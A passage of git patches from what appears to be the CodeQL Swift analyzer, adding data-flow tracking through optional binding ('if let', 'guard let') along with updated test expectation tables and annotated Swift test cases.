test.swift:381:19:381:19 | a | +| test.swift:382:10:382:30 | SSA def(a) | test.swift:383:19:383:19 | a | +| test.swift:382:10:382:30 | SSA def(b) | test.swift:384:19:384:19 | b | | test.swift:387:9:387:13 | SSA def(b) | test.swift:389:12:389:12 | b | | test.swift:387:22:387:40 | call to ... | test.swift:387:9:387:13 | SSA def(b) | +| test.swift:392:10:392:25 | SSA def(a) | test.swift:393:19:393:19 | a | +| test.swift:394:10:394:30 | SSA def(a) | test.swift:395:19:395:19 | a | +| test.swift:394:10:394:30 | SSA def(b) | test.swift:396:19:396:19 | b | | test.swift:399:9:399:9 | SSA def(c) | test.swift:401:12:401:12 | c | | test.swift:399:13:399:38 | call to ... | test.swift:399:9:399:9 | SSA def(c) | +| test.swift:404:10:404:25 | SSA def(a) | test.swift:405:19:405:19 | a | +| test.swift:406:10:406:30 | SSA def(a) | test.swift:407:19:407:19 | a | +| test.swift:406:10:406:30 | SSA def(b) | test.swift:408:19:408:19 | b | diff --git a/swift/ql/test/library-tests/dataflow/taint/LocalTaint.expected b/swift/ql/test/library-tests/dataflow/taint/LocalTaint.expected index 032a4669c71..dc17e269435 100644 --- a/swift/ql/test/library-tests/dataflow/taint/LocalTaint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/LocalTaint.expected @@ -1276,9 +1276,11 @@ | url.swift:102:46:102:46 | [post] urlTainted | url.swift:120:46:120:46 | urlTainted | | url.swift:102:46:102:46 | urlTainted | url.swift:102:15:102:56 | call to URL.init(string:relativeTo:) | | url.swift:102:46:102:46 | urlTainted | url.swift:120:46:120:46 | urlTainted | +| url.swift:104:5:104:9 | SSA def(x) | url.swift:105:13:105:13 | x | | url.swift:104:25:104:25 | [post] clean | url.swift:113:26:113:26 | clean | | url.swift:104:25:104:25 | clean | url.swift:104:13:104:30 | call to URL.init(string:) | | url.swift:104:25:104:25 | clean | url.swift:113:26:113:26 | clean | +| url.swift:108:5:108:9 | SSA def(y) | url.swift:109:13:109:13 | y | | url.swift:108:25:108:25 | [post] tainted | url.swift:117:28:117:28 | tainted | | url.swift:108:25:108:25 | tainted | url.swift:108:13:108:32 | call to URL.init(string:) | | url.swift:108:25:108:25 | tainted | url.swift:117:28:117:28 | tainted | From b5dd8152498c18de4fe7baa542693b3c0859f768 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 16 Dec 2022 18:16:17 +0000 Subject: [PATCH 122/381] Swift: Flow through optional binding. --- .../dataflow/internal/DataFlowPrivate.qll | 8 ++++++++ .../dataflow/dataflow/DataFlow.expected | 18 ++++++++++++++++++ .../dataflow/dataflow/LocalFlow.expected | 8 ++++++++ .../library-tests/dataflow/dataflow/test.swift | 10 +++++----- .../dataflow/taint/LocalTaint.expected | 2 ++ .../dataflow/taint/Taint.expected | 9 +++++++++ .../library-tests/dataflow/taint/url.swift | 2 +- 7 files changed, 51 insertions(+), 6 deletions(-) diff --git a/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll b/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll index 9a8b64af131..22226d8dfd7 100644 --- a/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll +++ b/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll @@ -153,6 +153,14 @@ private module Cached { or nodeFrom.asExpr() = nodeTo.asExpr().(OptionalEvaluationExpr).getSubExpr() or + // flow through optional binding `if let` + exists(ConditionElement ce, ConcreteVarDecl v | + ce.getInitializer() = nodeFrom.asExpr() and + ce.getPattern() = v.getParentPattern() and + //.(OptionalSomePattern).getSubPattern().(BindingPattern).getSubPattern().(NamedPattern) ? + nodeTo.asDefinition().getSourceVariable() = v + ) + or // flow through nil-coalescing operator `??` exists(BinaryExpr nco | nco.getOperator().(FreeFunctionDecl).getName() = "??(_:_:)" and diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected index 4676c63d995..b0d6edfcf91 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected @@ -107,7 +107,11 @@ edges | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:275:15:275:27 | ... ??(_:_:) ... | | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:279:15:279:31 | ... ? ... : ... | | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:280:15:280:38 | ... ? ... : ... | +| test.swift:263:13:263:28 | call to optionalSource() : | test.swift:285:19:285:19 | z | +| test.swift:263:13:263:28 | call to optionalSource() : | test.swift:291:16:291:17 | ...? : | +| test.swift:263:13:263:28 | call to optionalSource() : | test.swift:300:15:300:15 | z1 | | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:303:15:303:16 | ...! : | +| test.swift:263:13:263:28 | call to optionalSource() : | test.swift:307:19:307:19 | z | | test.swift:270:15:270:22 | call to source() : | file://:0:0:0:0 | [summary param] this in signum() : | | test.swift:270:15:270:22 | call to source() : | test.swift:270:15:270:31 | call to signum() | | test.swift:271:15:271:16 | ...? : | file://:0:0:0:0 | [summary param] this in signum() : | @@ -115,6 +119,9 @@ edges | test.swift:271:15:271:25 | call to signum() : | test.swift:271:15:271:25 | OptionalEvaluationExpr | | test.swift:280:31:280:38 | call to source() : | test.swift:280:15:280:38 | ... ? ... : ... | | test.swift:282:31:282:38 | call to source() : | test.swift:282:15:282:38 | ... ? ... : ... | +| test.swift:291:16:291:17 | ...? : | file://:0:0:0:0 | [summary param] this in signum() : | +| test.swift:291:16:291:17 | ...? : | test.swift:291:16:291:26 | call to signum() : | +| test.swift:291:16:291:26 | call to signum() : | test.swift:292:19:292:19 | z | | test.swift:303:15:303:16 | ...! : | file://:0:0:0:0 | [summary param] this in signum() : | | test.swift:303:15:303:16 | ...! : | test.swift:303:15:303:25 | call to signum() | | test.swift:331:14:331:26 | (...) [Tuple element at index 1] : | test.swift:335:15:335:15 | t1 [Tuple element at index 1] : | @@ -261,8 +268,14 @@ nodes | test.swift:280:31:280:38 | call to source() : | semmle.label | call to source() : | | test.swift:282:15:282:38 | ... ? ... : ... | semmle.label | ... ? ... : ... | | test.swift:282:31:282:38 | call to source() : | semmle.label | call to source() : | +| test.swift:285:19:285:19 | z | semmle.label | z | +| test.swift:291:16:291:17 | ...? : | semmle.label | ...? : | +| test.swift:291:16:291:26 | call to signum() : | semmle.label | call to signum() : | +| test.swift:292:19:292:19 | z | semmle.label | z | +| test.swift:300:15:300:15 | z1 | semmle.label | z1 | | test.swift:303:15:303:16 | ...! : | semmle.label | ...! : | | test.swift:303:15:303:25 | call to signum() | semmle.label | call to signum() | +| test.swift:307:19:307:19 | z | semmle.label | z | | test.swift:331:14:331:26 | (...) [Tuple element at index 1] : | semmle.label | (...) [Tuple element at index 1] : | | test.swift:331:18:331:25 | call to source() : | semmle.label | call to source() : | | test.swift:335:15:335:15 | t1 [Tuple element at index 1] : | semmle.label | t1 [Tuple element at index 1] : | @@ -311,6 +324,7 @@ subpaths | test.swift:219:13:219:15 | .a [x] : | test.swift:163:7:163:7 | self [x] : | file://:0:0:0:0 | .x : | test.swift:219:13:219:17 | .x | | test.swift:270:15:270:22 | call to source() : | file://:0:0:0:0 | [summary param] this in signum() : | file://:0:0:0:0 | [summary] to write: return (return) in signum() : | test.swift:270:15:270:31 | call to signum() | | test.swift:271:15:271:16 | ...? : | file://:0:0:0:0 | [summary param] this in signum() : | file://:0:0:0:0 | [summary] to write: return (return) in signum() : | test.swift:271:15:271:25 | call to signum() : | +| test.swift:291:16:291:17 | ...? : | file://:0:0:0:0 | [summary param] this in signum() : | file://:0:0:0:0 | [summary] to write: return (return) in signum() : | test.swift:291:16:291:26 | call to signum() : | | test.swift:303:15:303:16 | ...! : | file://:0:0:0:0 | [summary param] this in signum() : | file://:0:0:0:0 | [summary] to write: return (return) in signum() : | test.swift:303:15:303:25 | call to signum() | #select | test.swift:7:15:7:15 | t1 | test.swift:6:19:6:26 | call to source() : | test.swift:7:15:7:15 | t1 | result | @@ -351,7 +365,11 @@ subpaths | test.swift:280:15:280:38 | ... ? ... : ... | test.swift:259:12:259:19 | call to source() : | test.swift:280:15:280:38 | ... ? ... : ... | result | | test.swift:280:15:280:38 | ... ? ... : ... | test.swift:280:31:280:38 | call to source() : | test.swift:280:15:280:38 | ... ? ... : ... | result | | test.swift:282:15:282:38 | ... ? ... : ... | test.swift:282:31:282:38 | call to source() : | test.swift:282:15:282:38 | ... ? ... : ... | result | +| test.swift:285:19:285:19 | z | test.swift:259:12:259:19 | call to source() : | test.swift:285:19:285:19 | z | result | +| test.swift:292:19:292:19 | z | test.swift:259:12:259:19 | call to source() : | test.swift:292:19:292:19 | z | result | +| test.swift:300:15:300:15 | z1 | test.swift:259:12:259:19 | call to source() : | test.swift:300:15:300:15 | z1 | result | | test.swift:303:15:303:25 | call to signum() | test.swift:259:12:259:19 | call to source() : | test.swift:303:15:303:25 | call to signum() | result | +| test.swift:307:19:307:19 | z | test.swift:259:12:259:19 | call to source() : | test.swift:307:19:307:19 | z | result | | test.swift:335:15:335:18 | .1 | test.swift:331:18:331:25 | call to source() : | test.swift:335:15:335:18 | .1 | result | | test.swift:346:15:346:18 | .0 | test.swift:343:12:343:19 | call to source() : | test.swift:346:15:346:18 | .0 | result | | test.swift:356:15:356:18 | .0 | test.swift:351:18:351:25 | call to source() : | test.swift:356:15:356:18 | .0 | result | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected index 18c40476aad..9f87f10d8c8 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected @@ -242,28 +242,36 @@ | test.swift:282:26:282:27 | ...! | test.swift:282:15:282:38 | ... ? ... : ... | | test.swift:282:31:282:38 | call to source() | test.swift:282:15:282:38 | ... ? ... : ... | | test.swift:284:8:284:12 | SSA def(z) | test.swift:285:19:285:19 | z | +| test.swift:284:16:284:16 | x | test.swift:284:8:284:12 | SSA def(z) | | test.swift:284:16:284:16 | x | test.swift:291:16:291:16 | x | | test.swift:287:8:287:12 | SSA def(z) | test.swift:288:19:288:19 | z | +| test.swift:287:16:287:16 | y | test.swift:287:8:287:12 | SSA def(z) | | test.swift:287:16:287:16 | y | test.swift:294:16:294:16 | y | | test.swift:291:8:291:12 | SSA def(z) | test.swift:292:19:292:19 | z | | test.swift:291:16:291:16 | x | test.swift:291:16:291:17 | ...? | | test.swift:291:16:291:16 | x | test.swift:298:20:298:20 | x | +| test.swift:291:16:291:26 | OptionalEvaluationExpr | test.swift:291:8:291:12 | SSA def(z) | | test.swift:291:16:291:26 | call to signum() | test.swift:291:16:291:26 | OptionalEvaluationExpr | | test.swift:294:8:294:12 | SSA def(z) | test.swift:295:19:295:19 | z | | test.swift:294:16:294:16 | y | test.swift:294:16:294:17 | ...? | | test.swift:294:16:294:16 | y | test.swift:299:20:299:20 | y | +| test.swift:294:16:294:26 | OptionalEvaluationExpr | test.swift:294:8:294:12 | SSA def(z) | | test.swift:294:16:294:26 | call to signum() | test.swift:294:16:294:26 | OptionalEvaluationExpr | | test.swift:298:11:298:15 | SSA def(z1) | test.swift:300:15:300:15 | z1 | +| test.swift:298:20:298:20 | x | test.swift:298:11:298:15 | SSA def(z1) | | test.swift:298:20:298:20 | x | test.swift:303:15:303:15 | x | | test.swift:299:11:299:15 | SSA def(z2) | test.swift:301:15:301:15 | z2 | +| test.swift:299:20:299:20 | y | test.swift:299:11:299:15 | SSA def(z2) | | test.swift:299:20:299:20 | y | test.swift:304:15:304:15 | y | | test.swift:303:15:303:15 | x | test.swift:303:15:303:16 | ...! | | test.swift:303:15:303:15 | x | test.swift:306:28:306:28 | x | | test.swift:304:15:304:15 | y | test.swift:304:15:304:16 | ...! | | test.swift:304:15:304:15 | y | test.swift:309:28:309:28 | y | | test.swift:306:13:306:24 | SSA def(z) | test.swift:307:19:307:19 | z | +| test.swift:306:28:306:28 | x | test.swift:306:13:306:24 | SSA def(z) | | test.swift:306:28:306:28 | x | test.swift:313:12:313:12 | x | | test.swift:309:13:309:24 | SSA def(z) | test.swift:310:19:310:19 | z | +| test.swift:309:28:309:28 | y | test.swift:309:13:309:24 | SSA def(z) | | test.swift:309:28:309:28 | y | test.swift:319:12:319:12 | y | | test.swift:314:10:314:21 | SSA def(z) | test.swift:315:19:315:19 | z | | test.swift:320:10:320:21 | SSA def(z) | test.swift:321:19:321:19 | z | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test.swift b/swift/ql/test/library-tests/dataflow/dataflow/test.swift index 6ab6bb49d0f..f6721d3bb61 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test.swift @@ -282,14 +282,14 @@ func test_optionals(y: Int?) { sink(arg: y != nil ? y! : source()) // $ flow=282 if let z = x { - sink(arg: z) // $ MISSING: flow=259 + sink(arg: z) // $ flow=259 } if let z = y { sink(arg: z) } - if let z = x?.signum() { // $ MISSING: flow=259 - sink(arg: z) + if let z = x?.signum() { + sink(arg: z) // $ flow=259 } if let z = y?.signum() { sink(arg: z) @@ -297,14 +297,14 @@ func test_optionals(y: Int?) { guard let z1 = x else { return } guard let z2 = y else { return } - sink(arg: z1) // $ MISSING: flow=259 + sink(arg: z1) // $ flow=259 sink(arg: z2) sink(arg: x!.signum()) // $ flow=259 sink(arg: y!.signum()) if case .some(let z) = x { - sink(arg: z) // $ MISSING: flow=259 + sink(arg: z) // $ flow=259 } if case .some(let z) = y { sink(arg: z) diff --git a/swift/ql/test/library-tests/dataflow/taint/LocalTaint.expected b/swift/ql/test/library-tests/dataflow/taint/LocalTaint.expected index dc17e269435..0b2727f4da6 100644 --- a/swift/ql/test/library-tests/dataflow/taint/LocalTaint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/LocalTaint.expected @@ -1277,10 +1277,12 @@ | url.swift:102:46:102:46 | urlTainted | url.swift:102:15:102:56 | call to URL.init(string:relativeTo:) | | url.swift:102:46:102:46 | urlTainted | url.swift:120:46:120:46 | urlTainted | | url.swift:104:5:104:9 | SSA def(x) | url.swift:105:13:105:13 | x | +| url.swift:104:13:104:30 | call to URL.init(string:) | url.swift:104:5:104:9 | SSA def(x) | | url.swift:104:25:104:25 | [post] clean | url.swift:113:26:113:26 | clean | | url.swift:104:25:104:25 | clean | url.swift:104:13:104:30 | call to URL.init(string:) | | url.swift:104:25:104:25 | clean | url.swift:113:26:113:26 | clean | | url.swift:108:5:108:9 | SSA def(y) | url.swift:109:13:109:13 | y | +| url.swift:108:13:108:32 | call to URL.init(string:) | url.swift:108:5:108:9 | SSA def(y) | | url.swift:108:25:108:25 | [post] tainted | url.swift:117:28:117:28 | tainted | | url.swift:108:25:108:25 | tainted | url.swift:108:13:108:32 | call to URL.init(string:) | | url.swift:108:25:108:25 | tainted | url.swift:117:28:117:28 | tainted | diff --git a/swift/ql/test/library-tests/dataflow/taint/Taint.expected b/swift/ql/test/library-tests/dataflow/taint/Taint.expected index 3080ba03d15..659a3a91e68 100644 --- a/swift/ql/test/library-tests/dataflow/taint/Taint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/Taint.expected @@ -326,6 +326,7 @@ edges | url.swift:43:2:46:55 | [summary param] 0 in dataTask(with:completionHandler:) : | file://:0:0:0:0 | [summary] to write: argument 1.parameter 0 in dataTask(with:completionHandler:) : | | url.swift:57:16:57:23 | call to source() : | url.swift:59:31:59:31 | tainted : | | url.swift:57:16:57:23 | call to source() : | url.swift:83:24:83:24 | tainted : | +| url.swift:57:16:57:23 | call to source() : | url.swift:108:25:108:25 | tainted : | | url.swift:57:16:57:23 | call to source() : | url.swift:117:28:117:28 | tainted : | | url.swift:59:19:59:38 | call to URL.init(string:) : | url.swift:62:12:62:12 | urlTainted | | url.swift:59:19:59:38 | call to URL.init(string:) : | url.swift:64:12:64:23 | .absoluteURL | @@ -419,6 +420,9 @@ edges | url.swift:102:15:102:56 | call to URL.init(string:relativeTo:) : | url.swift:102:15:102:67 | ...! | | url.swift:102:46:102:46 | urlTainted : | url.swift:9:2:9:43 | [summary param] 1 in URL.init(string:relativeTo:) : | | url.swift:102:46:102:46 | urlTainted : | url.swift:102:15:102:56 | call to URL.init(string:relativeTo:) : | +| url.swift:108:13:108:32 | call to URL.init(string:) : | url.swift:109:13:109:13 | y | +| url.swift:108:25:108:25 | tainted : | url.swift:8:2:8:25 | [summary param] 0 in URL.init(string:) : | +| url.swift:108:25:108:25 | tainted : | url.swift:108:13:108:32 | call to URL.init(string:) : | | url.swift:117:16:117:35 | call to URL.init(string:) : | url.swift:118:12:118:12 | ...! | | url.swift:117:28:117:28 | tainted : | url.swift:8:2:8:25 | [summary param] 0 in URL.init(string:) : | | url.swift:117:28:117:28 | tainted : | url.swift:117:16:117:35 | call to URL.init(string:) : | @@ -1061,6 +1065,9 @@ nodes | url.swift:102:15:102:56 | call to URL.init(string:relativeTo:) : | semmle.label | call to URL.init(string:relativeTo:) : | | url.swift:102:15:102:67 | ...! | semmle.label | ...! | | url.swift:102:46:102:46 | urlTainted : | semmle.label | urlTainted : | +| url.swift:108:13:108:32 | call to URL.init(string:) : | semmle.label | call to URL.init(string:) : | +| url.swift:108:25:108:25 | tainted : | semmle.label | tainted : | +| url.swift:109:13:109:13 | y | semmle.label | y | | url.swift:117:16:117:35 | call to URL.init(string:) : | semmle.label | call to URL.init(string:) : | | url.swift:117:28:117:28 | tainted : | semmle.label | tainted : | | url.swift:118:12:118:12 | ...! | semmle.label | ...! | @@ -1261,6 +1268,7 @@ subpaths | url.swift:100:43:100:43 | urlTainted : | url.swift:9:2:9:43 | [summary param] 1 in URL.init(string:relativeTo:) : | file://:0:0:0:0 | [summary] to write: return (return) in URL.init(string:relativeTo:) : | url.swift:100:12:100:53 | call to URL.init(string:relativeTo:) : | | url.swift:101:46:101:46 | urlTainted : | url.swift:9:2:9:43 | [summary param] 1 in URL.init(string:relativeTo:) : | file://:0:0:0:0 | [summary] to write: return (return) in URL.init(string:relativeTo:) : | url.swift:101:15:101:56 | call to URL.init(string:relativeTo:) : | | url.swift:102:46:102:46 | urlTainted : | url.swift:9:2:9:43 | [summary param] 1 in URL.init(string:relativeTo:) : | file://:0:0:0:0 | [summary] to write: return (return) in URL.init(string:relativeTo:) : | url.swift:102:15:102:56 | call to URL.init(string:relativeTo:) : | +| url.swift:108:25:108:25 | tainted : | url.swift:8:2:8:25 | [summary param] 0 in URL.init(string:) : | file://:0:0:0:0 | [summary] to write: return (return) in URL.init(string:) : | url.swift:108:13:108:32 | call to URL.init(string:) : | | url.swift:117:28:117:28 | tainted : | url.swift:8:2:8:25 | [summary param] 0 in URL.init(string:) : | file://:0:0:0:0 | [summary] to write: return (return) in URL.init(string:) : | url.swift:117:16:117:35 | call to URL.init(string:) : | | webview.swift:84:10:84:10 | source : | webview.swift:36:5:36:41 | [summary param] this in toObject() : | file://:0:0:0:0 | [summary] to write: return (return) in toObject() : | webview.swift:84:10:84:26 | call to toObject() | | webview.swift:85:10:85:10 | source : | webview.swift:37:5:37:55 | [summary param] this in toObjectOf(_:) : | file://:0:0:0:0 | [summary] to write: return (return) in toObjectOf(_:) : | webview.swift:85:10:85:41 | call to toObjectOf(_:) | @@ -1422,6 +1430,7 @@ subpaths | url.swift:100:12:100:56 | .standardizedFileURL | url.swift:57:16:57:23 | call to source() : | url.swift:100:12:100:56 | .standardizedFileURL | result | | url.swift:101:15:101:63 | ...! | url.swift:57:16:57:23 | call to source() : | url.swift:101:15:101:63 | ...! | result | | url.swift:102:15:102:67 | ...! | url.swift:57:16:57:23 | call to source() : | url.swift:102:15:102:67 | ...! | result | +| url.swift:109:13:109:13 | y | url.swift:57:16:57:23 | call to source() : | url.swift:109:13:109:13 | y | result | | url.swift:118:12:118:12 | ...! | url.swift:57:16:57:23 | call to source() : | url.swift:118:12:118:12 | ...! | result | | url.swift:121:15:121:19 | ...! | url.swift:57:16:57:23 | call to source() : | url.swift:121:15:121:19 | ...! | result | | webview.swift:77:10:77:41 | .body | webview.swift:77:11:77:18 | call to source() : | webview.swift:77:10:77:41 | .body | result | diff --git a/swift/ql/test/library-tests/dataflow/taint/url.swift b/swift/ql/test/library-tests/dataflow/taint/url.swift index ecabb4e0cfb..aa7f00695fd 100644 --- a/swift/ql/test/library-tests/dataflow/taint/url.swift +++ b/swift/ql/test/library-tests/dataflow/taint/url.swift @@ -106,7 +106,7 @@ func taintThroughURL() { } if let y = URL(string: tainted) { - sink(arg: y) // $ MISSING: tainted=57 + sink(arg: y) // $ tainted=57 } var urlClean2 : URL! From bb50a99b369a5f29cf4f593ec03182f8fa522820 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Jan 2023 18:11:32 +0000 Subject: [PATCH 123/381] Swift: Additional test cases. --- .../dataflow/internal/DataFlowPrivate.qll | 1 - .../dataflow/dataflow/DataFlow.expected | 5 ++ .../dataflow/dataflow/LocalFlow.expected | 59 +++++++++++++++---- .../dataflow/dataflow/test.swift | 18 ++++++ 4 files changed, 72 insertions(+), 11 deletions(-) diff --git a/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll b/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll index 22226d8dfd7..36eda5c0055 100644 --- a/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll +++ b/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll @@ -157,7 +157,6 @@ private module Cached { exists(ConditionElement ce, ConcreteVarDecl v | ce.getInitializer() = nodeFrom.asExpr() and ce.getPattern() = v.getParentPattern() and - //.(OptionalSomePattern).getSubPattern().(BindingPattern).getSubPattern().(NamedPattern) ? nodeTo.asDefinition().getSourceVariable() = v ) or diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected index b0d6edfcf91..d95be652a64 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected @@ -100,6 +100,7 @@ edges | test.swift:225:14:225:21 | call to source() : | test.swift:235:13:235:15 | .source_value | | test.swift:225:14:225:21 | call to source() : | test.swift:238:13:238:15 | .source_value | | test.swift:259:12:259:19 | call to source() : | test.swift:263:13:263:28 | call to optionalSource() : | +| test.swift:259:12:259:19 | call to source() : | test.swift:437:13:437:28 | call to optionalSource() : | | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:265:15:265:15 | x | | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:267:15:267:16 | ...! | | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:271:15:271:16 | ...? : | @@ -140,6 +141,7 @@ edges | test.swift:357:15:357:15 | t1 [Tuple element at index 1] : | test.swift:357:15:357:18 | .1 | | test.swift:360:15:360:15 | t2 [Tuple element at index 0] : | test.swift:360:15:360:18 | .0 | | test.swift:361:15:361:15 | t2 [Tuple element at index 1] : | test.swift:361:15:361:18 | .1 | +| test.swift:437:13:437:28 | call to optionalSource() : | test.swift:440:19:440:19 | a | nodes | file://:0:0:0:0 | .a [x] : | semmle.label | .a [x] : | | file://:0:0:0:0 | .x : | semmle.label | .x : | @@ -296,6 +298,8 @@ nodes | test.swift:360:15:360:18 | .0 | semmle.label | .0 | | test.swift:361:15:361:15 | t2 [Tuple element at index 1] : | semmle.label | t2 [Tuple element at index 1] : | | test.swift:361:15:361:18 | .1 | semmle.label | .1 | +| test.swift:437:13:437:28 | call to optionalSource() : | semmle.label | call to optionalSource() : | +| test.swift:440:19:440:19 | a | semmle.label | a | subpaths | test.swift:75:21:75:22 | &... : | test.swift:65:16:65:28 | arg1 : | test.swift:65:1:70:1 | arg2[return] : | test.swift:75:31:75:32 | [post] &... : | | test.swift:114:19:114:19 | arg : | test.swift:109:9:109:14 | arg : | test.swift:110:12:110:12 | arg : | test.swift:114:12:114:22 | call to ... : | @@ -376,3 +380,4 @@ subpaths | test.swift:357:15:357:18 | .1 | test.swift:351:31:351:38 | call to source() : | test.swift:357:15:357:18 | .1 | result | | test.swift:360:15:360:18 | .0 | test.swift:351:18:351:25 | call to source() : | test.swift:360:15:360:18 | .0 | result | | test.swift:361:15:361:18 | .1 | test.swift:351:31:351:38 | call to source() : | test.swift:361:15:361:18 | .1 | result | +| test.swift:440:19:440:19 | a | test.swift:259:12:259:19 | call to source() : | test.swift:440:19:440:19 | a | result | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected index 9f87f10d8c8..88f69288dfb 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected @@ -318,16 +318,55 @@ | test.swift:361:15:361:15 | t2 | test.swift:362:15:362:15 | t2 | | test.swift:375:9:375:13 | SSA def(a) | test.swift:377:12:377:12 | a | | test.swift:375:22:375:23 | .myNone | test.swift:375:9:375:13 | SSA def(a) | +| test.swift:377:12:377:12 | a | test.swift:387:32:387:32 | a | | test.swift:380:10:380:25 | SSA def(a) | test.swift:381:19:381:19 | a | | test.swift:382:10:382:30 | SSA def(a) | test.swift:383:19:383:19 | a | | test.swift:382:10:382:30 | SSA def(b) | test.swift:384:19:384:19 | b | -| test.swift:387:9:387:13 | SSA def(b) | test.swift:389:12:389:12 | b | -| test.swift:387:22:387:40 | call to ... | test.swift:387:9:387:13 | SSA def(b) | -| test.swift:392:10:392:25 | SSA def(a) | test.swift:393:19:393:19 | a | -| test.swift:394:10:394:30 | SSA def(a) | test.swift:395:19:395:19 | a | -| test.swift:394:10:394:30 | SSA def(b) | test.swift:396:19:396:19 | b | -| test.swift:399:9:399:9 | SSA def(c) | test.swift:401:12:401:12 | c | -| test.swift:399:13:399:38 | call to ... | test.swift:399:9:399:9 | SSA def(c) | -| test.swift:404:10:404:25 | SSA def(a) | test.swift:405:19:405:19 | a | -| test.swift:406:10:406:30 | SSA def(a) | test.swift:407:19:407:19 | a | -| test.swift:406:10:406:30 | SSA def(b) | test.swift:408:19:408:19 | b | +| test.swift:387:13:387:28 | SSA def(x) | test.swift:388:19:388:19 | x | +| test.swift:387:32:387:32 | a | test.swift:387:13:387:28 | SSA def(x) | +| test.swift:387:32:387:32 | a | test.swift:390:37:390:37 | a | +| test.swift:390:13:390:33 | SSA def(x) | test.swift:391:19:391:19 | x | +| test.swift:390:13:390:33 | SSA def(y) | test.swift:392:19:392:19 | y | +| test.swift:390:37:390:37 | a | test.swift:390:13:390:33 | SSA def(x) | +| test.swift:390:37:390:37 | a | test.swift:390:13:390:33 | SSA def(y) | +| test.swift:390:37:390:37 | a | test.swift:407:32:407:32 | a | +| test.swift:395:9:395:13 | SSA def(b) | test.swift:397:12:397:12 | b | +| test.swift:395:22:395:40 | call to ... | test.swift:395:9:395:13 | SSA def(b) | +| test.swift:400:10:400:25 | SSA def(a) | test.swift:401:19:401:19 | a | +| test.swift:402:10:402:30 | SSA def(a) | test.swift:403:19:403:19 | a | +| test.swift:402:10:402:30 | SSA def(b) | test.swift:404:19:404:19 | b | +| test.swift:407:13:407:28 | SSA def(x) | test.swift:408:19:408:19 | x | +| test.swift:407:32:407:32 | a | test.swift:407:13:407:28 | SSA def(x) | +| test.swift:407:32:407:32 | a | test.swift:410:37:410:37 | a | +| test.swift:410:13:410:33 | SSA def(x) | test.swift:411:19:411:19 | x | +| test.swift:410:13:410:33 | SSA def(y) | test.swift:412:19:412:19 | y | +| test.swift:410:37:410:37 | a | test.swift:410:13:410:33 | SSA def(x) | +| test.swift:410:37:410:37 | a | test.swift:410:13:410:33 | SSA def(y) | +| test.swift:410:37:410:37 | a | test.swift:427:32:427:32 | a | +| test.swift:415:9:415:9 | SSA def(c) | test.swift:417:12:417:12 | c | +| test.swift:415:13:415:38 | call to ... | test.swift:415:9:415:9 | SSA def(c) | +| test.swift:420:10:420:25 | SSA def(a) | test.swift:421:19:421:19 | a | +| test.swift:422:10:422:30 | SSA def(a) | test.swift:423:19:423:19 | a | +| test.swift:422:10:422:30 | SSA def(b) | test.swift:424:19:424:19 | b | +| test.swift:427:13:427:28 | SSA def(x) | test.swift:428:19:428:19 | x | +| test.swift:427:32:427:32 | a | test.swift:427:13:427:28 | SSA def(x) | +| test.swift:427:32:427:32 | a | test.swift:430:37:430:37 | a | +| test.swift:430:13:430:33 | SSA def(x) | test.swift:431:19:431:19 | x | +| test.swift:430:13:430:33 | SSA def(y) | test.swift:432:19:432:19 | y | +| test.swift:430:37:430:37 | a | test.swift:430:13:430:33 | SSA def(x) | +| test.swift:430:37:430:37 | a | test.swift:430:13:430:33 | SSA def(y) | +| test.swift:436:21:436:27 | SSA def(y) | test.swift:439:27:439:27 | y | +| test.swift:436:21:436:27 | SSA def(y) | test.swift:444:22:444:22 | y | +| test.swift:436:21:436:27 | y | test.swift:436:21:436:27 | SSA def(y) | +| test.swift:437:9:437:9 | SSA def(x) | test.swift:439:16:439:16 | x | +| test.swift:437:13:437:28 | call to optionalSource() | test.swift:437:9:437:9 | SSA def(x) | +| test.swift:439:8:439:12 | SSA def(a) | test.swift:440:19:440:19 | a | +| test.swift:439:16:439:16 | x | test.swift:439:8:439:12 | SSA def(a) | +| test.swift:439:16:439:16 | x | test.swift:444:19:444:19 | x | +| test.swift:439:19:439:23 | SSA def(b) | test.swift:441:19:441:19 | b | +| test.swift:439:27:439:27 | y | 